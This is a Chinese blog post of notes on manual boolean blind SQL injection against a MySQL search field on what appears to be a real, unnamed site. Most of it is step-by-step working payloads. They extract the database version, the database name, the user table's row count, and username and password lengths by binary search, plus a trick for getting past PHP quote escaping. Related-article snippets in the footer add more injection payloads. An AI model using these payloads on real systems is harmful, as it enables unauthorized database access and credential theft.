mysql搜索型注入_MySQL搜索型盲注笔记

最新推荐文章于 2024-05-15 23:16:18 发布
最新推荐文章于 2024-05-15 23:16:18 发布
阅读量254 收藏
点赞数
文章标签: mysql搜索型注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39868959/article/details/113208293
版权

某大牛遇到个搜索型的注入,工具不好跑,于是相约一起手工,但我是菜逼,在查阅了文献并且经过疯子大牛的悉心提点下,便写下这篇笔记,和其他盲注手法一样,通过判断页面回显情况来进行注入=。=

注入点报错如下:

imgpxy.php?url=gpj.801342517150803102%2F8031_htnom%2Fserutcip%2Fmoc.gidkcah.1cip%2F%2F%3Aptth

通过报错得知,这是个Mysql的库

0×01-判断数据库版本

通过left()截取,判断语句如下

%'and(SELECT left(version(),1)>4) and '%'=' /*回显正常*/

%'and(SELECT left(version(),1)>6) and '%'=' /*回显错误*/

%'and(SELECT left(version(),1)=5) and '%'=' /*回显正常*/

当>4时回显正常说明版本大于4,当大于6时回显错误,判断版本为5

0×02-判断数据库长度

%'and(SELECT length(database())>1) and '%'=' /*回显正常*/

%'and(SELECT length(database())>4) and '%'=' /*回显错误*/

%'and(SELECT length(database())=4) and '%'=' /*回显正常*/

通过回显,猜测出数据库长度为4

imgpxy.php?url=gpj.432152517150803102%2F8031_htnom%2Fserutcip%2Fmoc.gidkcah.1cip%2F%2F%3Aptth

imgpxy.php?url=gpj.662272517150803102%2F8031_htnom%2Fserutcip%2Fmoc.gidkcah.1cip%2F%2F%3Aptth

0×03-猜解数据库名

%'and(SELECT left(database(),1))>'1' and '%'='

%'and(SELECT left(database(),1))>'1' and '%'='

%'and(SELECT left(database(),1))='p' and '%'=' p

%'and(SELECT left(database(),2))='ph' and '%'=' ph

%'and(SELECT left(database(),3))='php' and '%'=' php

%'and(SELECT left(database(),4))='phpx' and '%'='

此处用了经典的折半法猜解

%'and(SELECT left(database(),1))>'1' and '%'=' /*回显正常*/

%'and(SELECT left(database(),1))>'9' and '%'=' /*回显正常*/

/*说明第一个字符不是数字*/

%'and(SELECT left(database(),1))>'a' and '%'=' /*回显正常*/

%'and(SELECT left(database(),1))>'z' and '%'=' /*回显错误*/

/*开始折半*/

%'and(SELECT left(database(),1))>'m' and '%'=' /*回显正常说明在m-z间*/

%'and(SELECT left(database(),1))>'r' and '%'=' /*回显错误说明在m-r间*/

%'and(SELECT left(database(),1))='p' and '%'='/*回显正常,确定了为p*/

%'and(SELECT left(database(),2))='ph' and '%'='/*回显正常说明第二个字符为h*/

…………

根据上面说的拆半法,依次猜解出了数据库名为phpx

0×04-猜解字段

%'and(select count(username)from user)>0 and '%'='

猜解user表中的总数

%'and(select count(*)from user)>2 and '%'=' /*回显错误*/

%'and(select count(*)from user)>1 and '%'='/*回显正确*/

%'and(select count(*)from user)=2 and '%'='/*回显正确,说明有俩*/

密码猜解也是这样的方法

0×05-猜解username的长度

%'and (select (select length(username) from user limit 0,1) from user limit 0,1)>0 and '%'=' /*回显正确*/

%'and (select (select length(username) from user limit 0,1) from user limit 0,1)>9 and '%'=' /*回显正确*/

%'and (select (select length(username) from user limit 0,1) from user limit 0,1)>10 and '%'=' /*回显错误*/

%'and (select (select length(username) from user limit 0,1) from user limit 0,1)=10 and '%'=' /*回显正确,说明第一位username有10位*/

%'and (select (select length(username) from user limit 1,1) from user limit 1,1)>0 and '%'=' /*回显正确,第二位同样为10位*/

0×06-猜解值

猜解值太苦逼了,使用burpsuite来不断的提交post猜解算了,方法都是一样的

0×07-猜解password

方法和猜解username的一样,不再做赘述

0×08-关于特殊字符和避免php的GPC转义

如果遇到特殊字符的话会更加苦逼,此处可以用到substr函数,使用方法可以参看手册,示例可参看习科的一文

避免GPC转义

select substr(left((select user from ebt_user),1),1,1)=char(48)

%'and(SELECT left(version(),1)=5) and '%'='

最后,感谢疯子大牛的帮助,他的博客是http://fuck.0day5.com

weixin_39868959
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
pikachu之搜索注入
weixin_43622525的博客
03-07 6846
目录 pikachu 简介 搭建 windows Docker SQL注入 搜索注入 pikachu 简介 Pikachu是一个带有漏洞的Web应用系统,在这里包含了常见的web安全漏洞。 如果你是一个Web渗透测试学习人员且正发愁没有合适的靶场进行练习,那么Pikachu可能正合你意。 搭建 windows 搭建phpstudy环境,将pikachu解压在网站根目录进行搭建。 Docker docker build -t "pikachu" . docker run
MySQL 索引学习笔记
m0_47396773的博客
03-19 824
MySQL 索引学习笔记
mysql搜索注入_各类注入汇总及简单绕过思路
weixin_33751197的博客
02-08 397
数字注入:www.secist.com/news.asp?id=11select * from news where id=11www.secist.com/news.asp?id=11 and 1=1select * from news where id=11 and 1=1字符注入:www.secist.com/news.asp?id=你好select * from news where ...
SQL注入系列之PHP+Mysql手动注入(三)----搜索(POST/GET)
热门推荐
fendo
02-26 1万+
一、搜索注入简介与原理 1)简介 一些网站为了方便用户查找网站的资源,都对用户提供了搜索的功能,因为是搜索功能,往往是程序员在编写代码时都忽略了对其变量(参数)的过滤,而且这样的漏洞在国内的系统中普遍的存在: 2)原理 $sql="select * from user where password like '%$pwd%' order by pa
SQL注入常见类注入点的判断
最新发布
qq_64395221的博客
05-15 966
字符注入的时候我们需要逃逸单引号,但是php提供了魔术引号开关magic_quotes_gpc和addslashes(),iconv()函数作为防御,特点是自动给传入的参数如单引号,双引号,反斜杠,%00前面加一个反斜杠,进行转义,避免单引号进行逃逸。id=1这种形式的url,这个时候我们输入and 1=1与and 1=2,进行判定看是否会出现and 1=1回显正常,and 1=2回显不正常的情况。sql语句的变量并不是直接传入的变量,而是通过其它的方式保存到了数据库,形成二次注入
SQL注入搜索注入
qxx5203的博客
07-22 2615
SQL语句selectusername,idfromadminwhereusernamelike'%$name%'"%"匹配任何字符,"like"的意思就是像,"$"变量。正常回显,却无法判断字段数,也无法查看报错位。数据库表的信息(blog,heroes,movies,进入靶场后出现此界面,在登录界面输入。8页面显示不正常,发现最大正常位是。数据库列的信息id,num,判断一下是数字还是字符。账号密码错误或用户未册!搜索框内输入a正常回显。...
pikachu靶场--SQL inject--数字(post)/字符(get)/搜索/xx注入【4.1】~【4.4】
lmei1228的博客
06-10 789
当我们输入字符的时候,正常情况下,后台会给输入的字符+单引号,把他作为一个整个的字符串来处理,所以我们如果输入的是kobe or 1 = 1,传到后台的时候,or 1 = 1就不会起作用了,因此我们要构造闭合,输入kobe’ or 1 = 1#(#用--替换也可以,都是有着释的意思,把后面的单引号释掉),可以看到,它也能实现遍历。首先,打开我们的mysql数据库,use pikachu,然后对表“member”做查询,可以看到当参数为“1”和“1 or 1=1”时,所查询到的结果时大不相同的。
MySQL学习笔记-索引
Dylancy的博客
07-26 404
1.什么是索引? 索引是对数据库表中一列或多列的值进行排序的一种结构,使用索引可快速访问数据库表中的特定信息。如果想按特定职员的姓来查找他或她,则与在表中搜索所有的行相比,索引有助于更快地获取信息。 索引的一个主要目的就是加快检索表中数据的方法,亦即能协助信息搜索者尽快的找到符合限制条件的记录ID的辅助数据结构。 2.索引的优缺点: 2.1索引的优点: 1、通
MySQL注入笔记
07-29
MySQL注入是一种安全漏洞,发生在应用程序将用户输入的参数直接拼接到SQL查询语句中时,攻击者可以通过构造特定的输入来执行非预期的SQL命令,从而获取敏感信息、篡改数据甚至控制整个数据库系统。本笔记主要探讨了...
Mysql注入.pdf
01-25
常见的MySQL注入技术包括错误注入、时间和堆叠查询等。 为了防止MySQL注入,开发者应遵循以下最佳实践: 1. **参数化查询**:使用预编译的SQL语句,如PHP的PDO或MySQLi的预处理语句,确保用户输入被作为数据而...
手工注入常用SQL语句笔记.docx
04-10
手工注入常用 SQL 语句笔记MySQL 和 MSSQL 两种数据库管理系统进行了详细的介绍。 一、MySQL 注入原理 用户输入的内容被当作 SQL 语句来执行。攻击者可以通过构造特殊的输入来inject恶意的 SQL 代码,使得...
MYSQL 射精华.zip
09-16
3. **与时间基注入**:在无法直接查看查询结果的情况下,攻击者可能使用或时间基注入,通过检测查询执行时间的差异来获取信息。 4. **预防措施**: - 使用参数化查询(预编译语句):这是防止SQL注入的最...
渗透学习笔记
12-30
这份名为"渗透学习笔记"的压缩包包含了多个文本文件,涵盖了渗透测试中的一些关键领域,如MySQL注入、CMS探测、数据库探测等。以下是这些知识点的详细说明: 1. **MySQL大全.txt**: MySQL注入是常见的Web应用...
Pickachu第四弹:SQL注入
Pisces_mango的博客
09-03 1109
目录 一、数字注入(post) 二、字符输入(get) 三、搜索注入 四、xx注入 五、“insert/update”注入 六、“delete”注入 七、“http header”注入 八、(base on boolian) 九、(base on time) 十、宽字节注入 十一、手工测试流程 十二、报错利用流程 一、数字注入(post) 看到输入点后,我们想象一下它在数据库中是怎样操作的,select 字段1,字段2 from 表名 where id=1
关于sql注入这一篇就够了(适合入门)
qq_53105813的博客
01-07 4941
sql注入详解
SQL注入(二):字符+搜索+ XX+insert/update
NSQ0207的博客
07-19 384
1、使用 ' 进行测试2、使用order by 测试有几个字段3、使用union select 1,2 查看字段。
常见的web漏洞之 sql注入
weixin_47399833的博客
11-17 1728
简单学习一下网络安全啦
一文了解pikachu的SQL注入
allintao的博客
03-01 2689
本文章主要讲解关于pikachu的注入方式。目录一、数字注入(post)二、字符注入(get)三、搜索注入四、xx注入五、"insert/update"注入六、"delete"注入七、"http header"注入八、(base on boolian)九、(base on time)十、宽字节注入
pikachu之特殊注入搜索注入、xx注入、insert/update注入、delete注入、宽字节注入
2301_80661529的博客
03-02 1263
如果一个字符的大小是一个字节的,称为窄字节;如果一个字符的大小是两个字节的,成为宽字节。
MySQL布尔高级实战与技巧解析
在实战中,布尔可能表现为字符注入,即使看起来像是数字。攻击者需要意的是,前端接收数字可能将其作为字符串处理,这可能导致看似数字注入实际上隐藏着字符注入的可能。利用burpsuite等工具自动化...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值